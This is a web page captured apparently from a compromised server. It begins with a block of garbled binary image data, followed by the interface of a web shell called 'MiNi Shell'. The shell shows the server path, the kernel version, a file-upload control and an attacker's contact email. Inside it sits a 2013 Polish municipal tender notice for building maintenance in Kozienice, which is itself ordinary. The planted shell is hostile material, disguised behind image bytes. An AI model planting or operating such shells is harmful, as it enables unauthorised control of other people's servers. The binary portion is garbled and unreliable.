JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130206/50404-N-2013.html

<p class="kh_header"><b>Kozienice: Świadczenie usług remontowych w zakresie branż budowlanej i instalacyjnych oraz stałej konserwacji budynków i lokali   na terenie Gminy Kozienice administrowanych, zarządzanych przez Zamawiającego wraz z usuwaniem awarii i wykonywaniem drobnych napraw remontowych i naprawczych</b><br>
<b>Numer ogłoszenia: 50404 - 2013; data zamieszczenia: 06.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarządzanie Mieniem Komunalnym Gminy Kozienice , ul. Radomska 36, 26-900 Kozienice, woj. mazowieckie, tel. 48 614 43 88, faks 48 614 43 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zmkgk.bip.kozienice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://zmkgk.bip.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług remontowych w zakresie branż budowlanej i instalacyjnych oraz stałej konserwacji budynków i lokali   na terenie Gminy Kozienice administrowanych, zarządzanych przez Zamawiającego wraz z usuwaniem awarii i wykonywaniem drobnych napraw remontowych i naprawczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Instalacje elektryczne i odgromowe:
a)	przeglądy konserwacyjne instalacji elektrycznych , oświetlenia, odgromowej;
b)	uzupełnienie oznaczeń tablic i przewodów;
c)	naprawa mocowań zacisków i połączeń;
d)	wymiana przewodów połączeniowych, mostkujących, itp.;
e)	naprawa mocowania przewodów prowadzonych po wierzchu konstrukcji;
f)	naprawa mocowania puszek instalacyjnych osprzętu;
g)	wymiana pojedynczych bezpieczników ( bez tablic zabezpieczających);
h)	wymiana uszkodzonych i niesprawnych żarówek w pomieszczeniach wspólnego użytkowa-nia;
i)	wymiana uszkodzonych i niesprawnych wyłączników w pomieszcz. j. w.
j)	wymiana uszkodzonych opraw, osłon, i kloszy oświetlenia; j.w. 
k)	regulacja urządzeń zabezpieczających i sterowniczych;
l)	konserwacja i porządkowanie tablic i złączy elektrycznych, usuwanie zanieczyszczeń;
m)	konserwacja i regulacja zamknięć szafek elektrycznych;
n)	uzupełnienie zabezpieczeń antykorozyjnych i powłok malarskich szafek elektrycznych;
o)	sprawdzanie sprawności urządzeń pomiarowych w części wspólnej;
p)	zgłaszanie do właściciela sieci (ZE) o wszelkich nieprawidłowościach i zakłóceniach wystę-pujących w funkcjonowaniu przyłączy elektrycznych i montowanych na nich urządzeniach.

2. Instalacje gazowe:
a)	likwidacja nieszczelności połączeń i przewodów;
b)	przeglądy, konserwacja, regulacja zaworów;
c)	uzupełnianie zabezpieczeń antykorozyjnych i powłok malarskich szafek gazowych 
i instalacji;
d)	uszczelnianie przejść przewodów przez przegrody;
e)	sprawdzanie sprawności urządzeń pomiarowych gazomierzy w części wspólnej;
f)	naprawa mocowania przewodów instalacji;
g)	konserwacja szafek gazowych i regulacja zamknięć, usuwanie zanieczyszczeń, uzupełnianie oznaczeń;
h)	wykonanie próby szczelności instalacji gazowej w nowo zasiedlonych lokalach gminnych;
i)	zgłaszanie do właściciela sieci (ZG) o wszelkich nieprawidłowościach i zakłóceniach wy-stępujących w funkcjonowaniu przyłączy gazowych i montowanych na nich urządzeniach i osprzęcie.

3. Instalacje wodno-kanalizacyjne:
a)	likwidacja nieszczelności połączeń i przewodów oraz przejść przewodów przez przegrody;
b)	konserwacja, regulacja i uszczelnianie zaworów;
c)	naprawa lub wymiana uszkodzonych części przewodów instalacyjnych;
d)	usuwanie miejscowych przecieków w pionach i poziomach kanalizacyjnych, łącznie 
z wymianą poszczególnych elementów;  remont sieci kanalizacyjnych na przyłączach,
e)	 uzupełnianie oznaczeń, zabezpieczeń antykorozyjnych i powłok malarskich;
f)	instalacja wodomierzy, usuwanie zanieczyszczeń;
g)	uzupełnianie ubytków uszczelnień połączeń instalacji kanalizacji sanitarnej, deszczowej;
h)	odłączanie nieczynnych urządzeń i osprzętu; montaż nowych urządzeń;
i)	sprawdzenie sprawności urządzeń pomiarowych- wodomierzy w części wspólnej;
j)	czyszczenie i udrażnianie przyłączeniowych studzienek kanalizacji sanitarnych;
k)	naprawa i czyszczenie wywiewek dachowych (bez kosztu wywiewek);
l)	udrażnianie pionów i poziomów kanalizacyjnych ;
m)	zgłaszanie do właściciela sieci o wszelkich nieprawidłowościach 
i zakłóceniach występujących w funkcjonowaniu sieci sanitarnych, przyłączy wodociągo-wych i montowanych na nich urządzeniach i osprzęcie.

4. Dachy:
a)	czyszczenie rynien i rur spustowych;
b)	naprawa uszkodzonych elementów obróbek blacharskich, rynien i rur spustowych lub czę-ściowa wymiana;
c)	naprawa mocowania rynien i rur spustowych;
d)	likwidacja w pokryciu dachowym nieszczelności zakwalifikowanych do częściowej naprawy usuwanie nawisów śnieżnych, sopli lodu oraz odśnieżanie dachów w okresie zimowym;
e)	uzupełnianie zabezpieczeń antykorozyjnych i powłok malarskich elementów odwodnienia                  i obróbek blacharskich.
f)	Usuwanie śniegu i sopli. 

5. Stolarka drzwiowa i okienna: 
a)	regulacja i dopasowanie stolarki okiennej i drzwiowej w  częściach wspólnych: 
w klatkach schodowych , umywalniach, korytarzach i w piwnicach;
b)	regulacja i wymiana uszkodzonych zamków w pomieszczeniach j.w.;
c)	uzupełnianie okuć, szyldów, osłon w pom. j.w.;
d)	regulacja samozamykaczy;
e)	uzupełnianie malowania stolarki okiennej i drzwiowej;
f)	naprawa, wymiana lub wykonanie parapetów zewnętrznych i wewnętrznych.

6. Elementy budynku (mieszkania wewnątrz, elewacja, tynki, posadzki, klatki schodowe)  oraz oto-czenie budynków:
a)	uzupełnianie i naprawa tynków wewnętrznych ; 
b)	uzupełnianie i naprawa tynków zewnętrznych;
c)	likwidacja miejscowych rys i spękań tynków;
d)	naprawa uszkodzonych powłok malarskich ścian i sufitów; 
e)	uzupełnianie miejscowych ubytków i wymiana posadzek, okładzin schodów i okładzin ce-ramicznych;
f)	uzupełnianie miejscowych ubytków lub wymiana opasek, chodników i dojść do budynków itp;
g)	naprawa elementów i wymiana terenowych elementów odwadniających;
h)	naprawa mocowania balustrad klatek schodowych;
i)	mocowanie i wymiana pochwytów 
j)	naprawa mocowania wycieraczek;
k)	naprawa i bieżąca konserwacja zainstalowanych sprzętów na placach zabaw, demontaż zniszczonych urządzeń zabawowych;
l)	naprawa lub rozbiórka altanek śmietnikowych trzepaków, ławek i ogrodzeń;
m)	montaż lub naprawa tablic i znaków;

7. Usługi remontowe budowlane i instalacyjne: 
a)	malowanie ścian ,otworów okiennych i drzwiowych;
b)	uzupełnienie oszklenia w otworach okiennych;
c)	wymiana drzwi;
d)	wymiana wykładzin lub ich uzupełnienie;
e)	 wymiana i naprawa podłóg, reperacja posadzek;
f)	wymiana lub naprawa urządzeń sanitarnych i grzewczych;
g)	wymiana lub naprawa instalacji elektrycznej wraz z oprzętem; 
h)	montaż lub wymiana wodomierzy;
i)	utrzymanie w stanie gotowości będących na stanie urządzeń przeciwpożarowych budynków zgodnie z obowiązującymi przepisami

8. Dodatkowe warunki wykonawcze: 
Wykonawca zobowiązany jest do: 
- natychmiastowego  zgłaszania w trakcie wykonywania robót, zauważonych usterek i awarii zagra-żających bezpieczeństwu mieszkańców Gminy oraz mających wpływ na stan techniczny budynków i instalacji ,
- działania dotyczące  usuwania awarii należy podjąć  do 1,5 godzin od zgłoszenia awarii przez mieszkańców lub przez Inspektora Nadzoru ZMKGK oraz wykonać w dniu zgłoszenia awarii.

Uwaga:
Wyszczególnione rodzaje usług nie stanowią katalogu zamkniętego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>nie więcej jak 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3, 50.70.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie żąda zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia:
Przedmiotowy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że należycie wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę w ramach zawartej jednej umowy - kontraktu w zakresie konserwacji budowlanej i/lub instalacyjnych typu: naprawy bieżące     i konserwacyjne, która wykonywana była lub jest wykonywana przez nie mniej niż 12 miesięcy na zasobie wielomieszkaniowym o łącznej ilości min. 350 lokali oraz załączy dokumenty, potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.

Uwaga:
Przez zasoby wielomieszkaniowe należy rozumieć zasób złożony z samodzielnych lokali mieszkalnych lub/i wydzielonych w budynkach lokali użytkowych.

Opis sposobu dokonywania oceny powyższego warunku.
Zamawiający dokona oceny sprawdzania tego warunku na podstawie wykazu wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert,       a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przedmiotu, dat wykonania     i odbiorców, sporządzonego według wzoru stanowiącego załącznik nr 3 do SIWZ  oraz załącze-niem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należy-cie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia:  
Przedmiotowy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje (lub przedstawi informację o podstawie do dysponowania) co najmniej nw. osobami:
a)	dwoma elektrykami posiadającymi  Świadectwa kwalifikacji E - uprawniające do zajmowania się eksploatacją urządzeń instalacji i sieci na stanowisku eksploatacji, Grupa 1: urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energie elektryczną, zakres do 1kV,
b)	jedną  osobą posiadającymi Świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji, grupa 3: urządzenia, instalacje i sieci gazowe, wytwarzające, przetwarzające, przesyłające, magazynujące i zużywające paliwa gazowe,        
c)	jednym  hydraulikiem
d)	jedną osobą posiadającą kwalifikacje zawodowe do kierowania robotami budowlanymi tj. osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.)  w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów obowiązujących na  terenie kraju z którego pochodzi dana osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w ww. specjalności.
Opis sposobu dokonywania oceny tego warunku

Zamawiający dokona oceny sprawdzania tego warunku na podstawie:
a)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego według wzoru stanowiącego załącznik nr 4 do SIWZ,
b)	oświadczenia potwierdzającego, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania ta-kich uprawnień; sporządzone według wzoru stanowiącego załącznik nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z zapisami art. 26 ust. 2b ustawy PZP, Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je doku-mentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miej-sca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku składania oferty wspólnej w oparciu o art. 23 ustawy (oferta wspólna).	Pełnomocnictwo do podpisania oferty o ile nie wynika ono z załączonych dokumentów do ofer-ty (jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	Gdy nastąpi zmiana stawki podatku VAT przez władze ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku  akcyzowym. 
b)	Gdy nastąpi zmiany zasobu zarządzanego i administrowanego przez Zamawiającego.
c)	Gdy wystąpią inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością realizacji przedmiotu umowy,
d)	W przypadku zaistnienia uzasadnionej potrzeby zmiany podwykonawcy - jeżeli Wykonawca w celu potwierdzenia warunku udziału w postępowaniu posługiwał się zasobami dotyczącymi podwykonawców, zmiana podwykonawcy  możliwa jest po przedłożeniu przez wykonawcę dokumentów potwierdzających spełnienie warunku udziału w postępowaniu przez zaproponowanego podwykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zmkgk.bip.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarządzanie Mieniem Komunalnym Gminy Kozienice
ul. Radomska 36 26-900 Kozienice - biuro podawcze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 12:00, miejsce: Zarządzanie Mieniem Komunalnym Gminy Kozienice
ul. Radomska 36 26-900 Kozienice - biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com